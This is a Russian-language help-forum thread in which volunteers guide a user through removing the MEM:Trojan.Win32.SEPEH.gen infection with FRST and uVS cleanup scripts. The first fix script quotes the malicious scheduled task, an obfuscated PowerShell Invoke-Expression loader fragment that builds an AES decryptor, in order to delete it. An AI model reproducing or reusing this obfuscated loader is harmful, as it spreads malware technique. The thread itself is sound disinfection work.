Перейти к содержанию
Правила раздела

MEM:Trojan.Win32.SEPEH.gen

eosex

Автор eosex
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Sandor

Sandor

Опубликовано
Опубликовано
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код: 
    Start::
CloseProcesses:
SystemRestore: On
CreateRestorePoint:
Task: {36D0A3F9-EFDA-4430-9646-7D7EC6308F49} - System32\Tasks\$nya-CcVuc329 => C:\Windows\system32\cmd.exe [339968 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> /C echo function mXiJ($ocUH){	Invoke-Expression -Debug -InformationAction Ignore '$Bwqa=ie[ieSyiestieemie.Sieeiecieuierieiietyie.ieCierieyiepietoiegierieaiepiehiey.ieAieeiesie]:ie:ieCierieeieatieeie(ie);'.Replace('ie', '');	Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction (запись имеет ещё 3541 символов). <==== ВНИМАНИЕ
FirewallRules: [{DD1CE507-77A0-4C90-BBB4-4F4468856A14}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла
FirewallRules: [{6A5DAEB1-DEE7-47AE-A319-76EC3E56588C}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла
FirewallRules: [{6B9FD7B8-B9FA-4513-B3C9-27DB457F5857}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла
FirewallRules: [{EF9D1807-7C8F-4DF3-8BA7-D59544D53B89}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла
Reboot:
End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

После этого проверьте ещё раз антивирусом Касперского.

  • Like (+1) 1
  • Ответов 37
  • Создана
  • Последний ответ

Топ авторов темы

  • eosex

    19

  • Sandor

    18

  • thyrex

    1

Популярные дни

Топ авторов темы

Популярные дни

Популярные посты

Sandor
Sandor

Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: Task: {36D0A3F9-EFDA-4430-9646-7D7EC6308F49} - System32\Tasks\$nya-C

thyrex
thyrex

Очистите отчеты антивируса с найденными угрозами, запустите полную проверку антивирусом и сообщите результат.

Изображения в теме

eosex

eosex

Опубликовано
  • Автор
Опубликовано

image.thumb.png.4197fb542420ed79e996059ff5f7690d.pngimage.thumb.png.ac891307fb9babc10cfc0a1006532f50.png
Все так же... фикс прикрепил, не понимаю, почему не получается их удалить..

Fixlog.txt

thyrex

thyrex

Опубликовано
Опубликовано

Очистите отчеты антивируса с найденными угрозами, запустите полную проверку антивирусом и сообщите результат.

  • Like (+1) 1
eosex

eosex

Опубликовано
  • Автор
Опубликовано

SEPEH пропали, но пишется, что 1 объект не обработан. Захожу посмотреть, что за объект, а его просто него.

Sandor

Sandor

Опубликовано
Опубликовано

Соберите ещё раз новые логи FRST.txt и Addition.txt

Sandor

Sandor

Опубликовано
Опубликовано

В логах я проблем не вижу.

 

16 часов назад, eosex сказал:

пишется, что 1 объект не обработан

Это всё ещё есть?

eosex

eosex

Опубликовано
  • Автор
Опубликовано

щас проверку запустил, скажу если что-то не так

Sandor

Sandor

Опубликовано
Опубликовано

Хорошо. По окончании сделаем некоторую очистку.

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена: 
    ;uVS v4.99.10v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c

;---------command-block---------
delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\BNXHAIMOJRLGGDXNTJGRBUBJGMBWV
delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\FBZQZKYQWHMMOYWSDKXSONUCTVO
delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\JCZIHPSLDYBAISDGURDJNFEWNUFVD
delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\TUUFEMTZNEUSPYUFOOBOX
delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\VCPLITLKUBMKH
delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\XSYBZVJJKRJNKEV
apply

regt 40

restart

     

  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена…"
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер будет перезагружен.
  6. В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению.

Подробнее читайте в этом руководстве.

Sandor

Sandor

Опубликовано
Опубликовано
14 минут назад, Sandor сказал:

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению

Файл забыли.

Sandor

Sandor

Опубликовано
Опубликовано
Чтобы просмотреть отчеты, выполните следующие действия:
  1. В главном окне приложения в разделе Мониторинг нажмите на плитку Отчеты. Отчеты
  2. В списке компонентов и задач выберите компонент или задачу. ...
  3. Если требуется просмотреть подробную информацию о событии, выберите в отчете нужное событие.

Так получится посмотреть (а лучше экспортировать) отчёт об этой невидимой угрозе?

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Aizekelinho
      MEM:Trojan.win32.SEPEH.gen
      Автор Aizekelinho
      Касперским был обнаружен вирус MEM:Trojan.win32.SEPEH.gen, после проверки не удаляется, вот логи
      CollectionLog-2025.01.16-19.02.zip
    • mtt
      MEM:Trojan.Win32.SEPEH.gen
      Автор mtt
      kvrt обнаружил троян MEM:Trojan.Win32.SEPEH.gen. При попытке лечения чёрный экран.
       
      CollectionLog-2023.11.16-19.07.zip
    • krovin
      mem:trojan.win32.sepeh.gen
      Автор krovin
      доброго дня. год назад CollectionLog-2023.09.11-14.35.zipскачал архив и только недавно Kaspersky Total Secruity заметил троян. Вроде как лечит, но после перезагрузки он опять работает как svchost.exe сразу как 4-6 службы, нагружая память до 5-7К. логи выше
    • Kapibara
      [РЕШЕНО] MEM:Trojan.Win32.SEPEH.gen
      Автор Kapibara
      Здравствуйте! Сегодня обнаружил сработку c помощью KES 12.5. Объект lsass.exe. При нажатии "Устранить" ничего не происходит, лишь меняется время сработки. Полагаю, где-то есть .exe, который перезапускает этот процесс, но не нашел его. Файл образа автозапуска из Uvs прилагаю.

      2025-04-11_16-52-36_v4.99.12v x64.7z
    • ysomad
      [РЕШЕНО] MEM:Trojan.Win32.SEPEH.gen
      Автор ysomad
      Здравствуйте, каким-то образом словил Win32.SEPEH.gen. Касперский файлы лечит, но он появляется снова и прыгает по разным файлам.
       
       
      Принудительное сканирование этих файлов ничего не дает. KRD тоже ничего не нашел.
      Прикрепляю логи CollectionLog-2025.01.26-21.54.zip
       
      Заранее спасибо за помощь.
×
×
  • Создать...